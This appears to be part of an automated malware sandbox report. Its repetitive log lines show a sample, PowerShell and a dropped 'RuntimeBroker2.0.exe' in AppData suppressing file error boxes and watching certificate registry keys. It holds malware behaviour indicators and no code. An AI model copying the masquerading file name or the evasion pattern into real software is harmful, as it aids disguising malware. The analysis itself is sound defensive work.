                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
